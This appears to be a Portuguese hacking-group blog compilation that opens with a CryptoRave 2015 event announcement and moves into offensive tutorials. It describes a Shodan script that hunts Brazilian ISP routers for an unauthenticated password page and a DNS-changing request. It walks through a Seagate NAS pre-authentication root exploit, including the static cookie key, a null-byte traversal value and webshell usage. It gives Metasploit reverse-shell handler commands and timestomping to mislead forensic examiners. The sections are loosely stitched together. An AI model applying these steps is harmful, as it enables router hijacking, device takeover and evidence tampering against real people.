Advanced Search, Applied through dorks ("set of search operators."), Capture sensitive information, failures in servers. Group aimed at advanced filters to search engines & Digital Security Research.
Em um mundo no qual precisamos das redes digitais para nos comunicar, nos informar e nos organizar, como resistir contra a vigilância em massa e a invasão de nossa privacidade? A CryptoRave 2015 é um evento de 24 horas contra a espionagem massiva, contra a violação das comunicações, em defesa da privacidade e da liberdade nas redes digitais. É um esforço coletivo para popularizar o uso de ferramentas de criptografia e de privacidade e para ampliar a segurança das pessoas que se comunicam nas redes. É um evento em defesa do direito à privacidade e da liberdade.
Entre 24 e 25 de abril de 2015 vamos realizar a segunda edição do encontro. A primeira CryptoRave foi em abril de 2014 em São Paulo e contou com a participação de aproximadamente 1000 (mil) pessoas. Os mesmos coletivos que organizaram a CryptoRave em 2014 (Actantes, Saravá, Escola de Ativismo), além de outros parceiros e indivíduos, vão realizar um grande evento para popularizar técnicas de privacidade, navegação anônima e práticas anti-vigilantistas e também discutir sobre os rumos da luta pela liberdade na rede.
A CryptoRave2015 seguirá o modelo adotado no ano passado, com atividades como oficinas, exposições, debates e palestras durante 24 horas ininterruptas, além da balada durante a madrugada, com DJ's e VJ's. Ao final, as pessoas realizarão a assinatura de suas chaves criptográficas para que possam se comunicar pelas redes de modo mais seguro. Haverá mais de 37 atividades e oficinas, além de palestras relâmpagos e do Espaço Ada, com atividades dedicadas a mulheres.
Este ano vamos receber convidados internacionais como:
. Peter Sunde, fundador do legendário site de compartilhamento de arquivos The Pirate Bay;
. Micah Anderson, ativista e desenvolvedor do projeto LEAP ( https://leap.se ) e do sistema operacional livre Debian ( https://debian.org );
. Katitza Rodrigues, ativista da Electronic Frontier Foundation ( EFF - https://eff.org/ );
. Andre Meister, ativista pelos direitos digitais, jornalista investigativo sobre temas do digital.
A CryptoRave 2015 é aberta ao público em geral e mais especificamente a jovens, estudantes, jornalistas, publicitários, artistas, professores e diversos profissionais ou amadores, que queiram aprender a usar técnicas de comunicação segura. Visa também reunir ativistas e integrantes dos movimentos que querem defender sua comunicação de intrusos e arapongas, estatais e privados.
Orçamento
Como o dinheiro será gasto?
Usaremos os recursos arrecadados aqui para contribuir com a cobertura dos gastos no evento, principalmente para disponibilizar uma boa conexão de internet e streaming, e para trazer os convidados internacionais.
Recentemente desenvolvemos o scanner RouterHunter BR que trabalha pela internet procurando por faixa de ips pre-definidas ou aleatórias encontrando routers(roteadores) caseiros vulneráveis a vulnerabilidade DNSchanger.
Routeh
Então me veio a ideia de montar um script separado que trabalha-se com o Shodan fazendo praticamente um trabalho parecido com o do routerhunter. A unica diferença do routerhunter para esse script é que ele trabalha juntamente com o Shodan com uma dork(filter) definida procurando por ips das operadoras (CTBC, OI, GVT, TELEFONICA) que são as principais operadoras com routers(roteadores) vulneráveis e verificando se pagina (password.cgi) está online ou não. (password.cgi) é uma pagina dentro do router que não requisita autenticação!
Nesses mesmos modelos de roteadores que é encontrada a pagina (password.cgi), Também pode ser encontrado o GET "dnscfg.cgi?dnsPrimary=DNS1&dnsSecondary=DNS2&dnsDynamic=0&dnsRefresh=1" que está presente no routerhunter. Então vamos colocar a mão na massa!
Antes vamos instalar as dependências necessárias para a utilização do script:
Depois de instalada todas as dependências vamos para a utilização do script.
1 Vocês iram precisar criar uma conta no Shodan.io 2 Vocês também iram precisar uma apikey para definir no código 3 Com a apikey nas mãos coloque ela na variável "key" na linha 31
Vamos a execução do script
python routeh.py
Ele ira iniciar o scan por ips no Shodan com a dork(filter) definida "DSL Router micro_httpd". Depois ele ira te retornar os IPS testados.
Processo Manual
O processo manual seria de duas formas utilizando o Scanhub e o Nmap
No Scanhub você pode utilizar esse filtro "((DSL Router micro_httpd) AND country:"br") AND service_names:http"
No nmap você irar usar o comando "nmap -sV -p 80 189.15.100.0-255"
Seagate é um fornecedor bem conhecido em soluções de hardware, com produtos disponíveis em todo o mundo. Sua linha de produtos NAS dirigidas às empresas é chamado de Business Storage 2-Bay NAS. Estes podem ser encontrados dentro de redes domésticas e empresariais e, em muitos casos, eles são expostos publicamente.
Os produtos que executam versões de firmware até a versão 2014,00319 foram encontrados vulnerabilidades que permitem a execução remota de código como usuário root.
Essas vulnerabilidades são exploráveis sem necessidade de qualquer forma de autorização no dispositivo.
Detalhes da Vulnerabilidade
Produtos Business Storage 2-Bay NAS vem com um aplicativo de gerenciamento de web habilitado. Este aplicativo permite que os administradores executem funções de configuração de dispositivos usuais, como a adição de usuários, a criação de controle de acesso, gerenciamento de arquivos etc...
A aplicação web é construído com as seguintes tecnologias de base:
PHP versão 5.2.13 (Lançado 25 de fevereiro de 2010)
CodeIgniter 2.1.0 (23 Lançado em novembro de 2011)
Lighttpd 1.4.28 (Lançado 22 de agosto de 2010)
Todas essas três tecnologias são claramente desatualizadas, e as versões listadas do PHP e CodeIgniter são conhecidos por terem problemas de segurança. Em cima dessas tecnologias seta uma aplicação PHP personalizado, que contém em si uma série de brechas relacionadas à segurança é digamos bem problemático.
Detalhes sobre as tecnologias setadas acima o porque estão defasadas, tais versões.
PHP 5.2.3
As versões do PHP anteriores à 5.3.4 permitir aos usuários especificar caminhos de arquivo que incluem um byte NULL (CVE-2006-7243). Essa brecha permite que os dados controlados pelo usuário para encerrar prematuramente caminhos de arquivo, permitindo controle total sobre a extensão do arquivo.
Demonstrado por .php\0.jpg no final do argumento para a função file_exists.
CodeIgniter 2.1.0
Versões do CodeIgniter 2.2.0 criam tokens de sessão que são constituídos de um array associativo PHP serializado (hash), que foi criptografada usando um algoritmo personalizado.
Este hash de PHP contém dados controladas pelo utilizador, o que torna possível para os usuários uma extração de chave pa (criptografar e descriptografar) o conteúdo do cookie (CVE-2014-8686). Uma vez decifrados, os usuários podem modificar o conteúdo do cookie e re-encrypt antes de enviá-lo de volta para o servidor, resultando em outros vetores de ataque potenciais, incluindo PHP object injection.
Exploitation / Bypass
É simples de explorar os problemas listados acima para obter a execução de código arbitrário no dispositivo como o usuário root. Os principais passos necessários para alcançar este objectivo são:
O atacante deve escrever código PHP para o sistema de arquivos no NAS.
Isso pode ser feito de várias maneiras, incluindo:
HTTP access envenenamento arquivo de log por meio do cabeçalho User-Agent.
HTTP error envenenamento arquivo de registro através do cabeçalho do host.
Modificando a descrição do dispositivo na interface do aplicativo web. Este escreve cadeias controladas pelo usuário para um arquivo localizado em /etc/DeviceDesc, no entanto, requer direitos administrativos.
Upload de arquivos para um compartilhamento de arquivo que o dispositivo tenha exposto.
O atacante deve, então, manipular o conteúdo da variável de idioma no cookie de sessão para que ele contém o caminho para o PHP controlado pelo invasor no sistema de arquivos.
A falha byte NULL em PHP deve ser utilizado no fim de este valor para forçar o PHP ignorar quaisquer caracteres que são acrescentados ao caminho do arquivo pelo aplicativo web.
O invasor, então, faz um pedido com os cookies manipulados, resultando na execução de código como root.
O Script-Exploit
Beyond Binary(https://beyondbinary.io/) produziu um módulo Metasploit e um script Python standalone que automatizar o processo de exploração. Cada um desses scripts ter a seguinte abordagem:
Conecta-se a meta de NAS e extrai um cookie ci_session.
Decifrar o cookie usando a chave de criptografia estática de 0f0a000d02011f0248000d290d0b0b0e03010e07 e extrair o hash PHP.
Modifica o hash PHP serializado para que o nome de usuário é definido como administrador e o campo is_admin está definido para yes.
Criptografe essa hash atualizando o PHP pronto para uso posterior como um cookie ci_session. Este cookie permite agora que os futuros pedidos para operar no NAS como se fossem um administrador("DILIÇÇA CARA").
Executar um pedido para extrair a configuração do host, que inclui a descrição do dispositivo.
Modificar a configuração de host para que a descrição do dispositivo contenha uma pequena stager payload.
Executar uma solicitação para atualizar a configuração do host com os novos dados, de modo que a stager payload é gravado em /etc/DeviceDesc.
Modificar o hash PHP novamente para que o parâmetro de idioma contenha o ../../../../etc/devicedesc\x00 como valor (note o byte NULL no final).
Criptografar a nova hash PHP pronto para uso futuro como um cookie ci_session.
Executar um pedido para NAS usando o cookie criado na etapa anterior. Isso chama a stager que foi escrito para o disco. Pedindo um mensagens como uma carga maior, que é gravado em disco na raiz do servidor web.
Executa um outro pedido que, em seguida, redefine a configuração de host de volta ao que era antes da exploração.
Shodan(https://www.shodan.io/) relata que há mais de 2.500 dispositivos expostos publicamente na Internet que são possíveis vulneráveis.
Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution (0day)
Some Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the login page, and hence is open to attack from users without the need for authentication. The cookie can be easily decrypted using a known static encryption key and re-encrypted once the PHP object string has been modified. This module has been tested on the STBN300 device.
CVE-2014-8684 , CVE-2014-8686 , CVE-2014-8687
Usage ===== seagape.py <ip> <port> [-c [ua]] - ip : ip or host name of the target NAS - port : port of the admin web ui - -c : (optional) create a cookie which will give admin access. Not specifying this flag results in webshell installation. - ua : (optional) the user agent used by the browser for the admin session (UA must match the target browser). Default value is listed below Example ======= Install and interact with the web shell: seagape.py 192.168.0.1 80
O console (msfconsole ou msf pro) suporta automação básica usando scripts de recursos. Esses scripts contêm um conjunto de comandos do console que são executadas quando as cargas de script. Além dos comandos básicos do console (core), esses scripts também são tratados como modelos ERB. ERB é uma maneira de incorporar o código Ruby diretamente em um documento. Isso permite que você chamar APIs que não são expostos através de comandos de console e até programaticamente gerar e retornar uma lista de comandos com base em sua própria lógica. Scripts de recursos podem ser especificados com a opção -r para o Console Metasploit e é executado automaticamente na inicialização se ele existir. Scripts de recursos também pode ser executado a partir do prompt do console por meio do comando de recursos (msf > resource file-to-run.rc)
O seguinte exemplo cria um arquivo de recurso para exibir o número da versão do metasploit.
este arquivo de recurso irá carregar um directorio externo (ao msf) para que você possa apontar Metasploit aos seus 0-day, exploits, codificadores, cargas úteis (payloads), se estão a desenvolver exploits, auxiliarys, pós-módulos em ruby, então esta é a opção perfeita para que você possa carregar o seu directorio de trabalho no banco de dados do metasploit.
run : msf > run multi_console_command -rc /root/autoruncommands.rc
ou executá-la no multi-manipulador (multi-handler) usando a flag AutoRunScript
run : msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/autoruncommands.rc' E
desta forma só precisamos de configurar o 'autorunscript' para apontar para o nosso arquivo de recursos, de modo que toda a vez que o manipulador (multi-handler) abre uma sessão irá executar todos os modulos escritos dentro do arquivo 'autoruncommands.rc'
O exemplo a seguir mostra como podemos persistir uma carga útil (payload) em post-exploração
run : msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.68 LPORT=666 AutoRunScript='multi_console_command -rc /root/Post-Auto.rc' E
Neste proximo exemplo vamos usar o nmap para escanear a nossa rede local em busca de hospedeiros vivos e exportar o relatorio em (.xml) formato, depois vamos construir um arquivo de recurso (msfdb.rc) para podermos exportar o arquivo xml para a base de dados do metasploit, para os hospedeiros encontrados poderem ser usados no metasploit.
As vezes no post-exploração precissamos de encobrir os nossos passos no systema alvo para enganar peritos forensicos, uma maneira de fazer isso é manipular o timestomp (mace) de um arquivo ou de um directorio (recursive) no exemplo a seguir vamos fazer o upload de um arquivo para o hospedeiro de destino e mudar o seu valor mace para outra data/hora para que o arquivo pareça ter sido criado/acessado no ano 2013, a flag (-r) permite-nos mudar o mace de todos os arquivos dentro de um directorio.
O arquivo de recurso seguinte (scanner.rc) requer que o usuário defina RHOSTS globalmente usando: setg RHOSTS 192.168.1.68 (ip alvo) antes de lançar o resource file, e ele se usa do commando 'db_nmap' para salvar o scan feito na base de dados do metasploit. na tag <ruby>usamos o nmap para escannear por vulnerabilidades no protocol smb e samba que serão guardados em 'services' e 'vulns', depois da tag </ruby> o resource file vai se usar dos resultados contidos na DB para correr modulos de post-exploração.
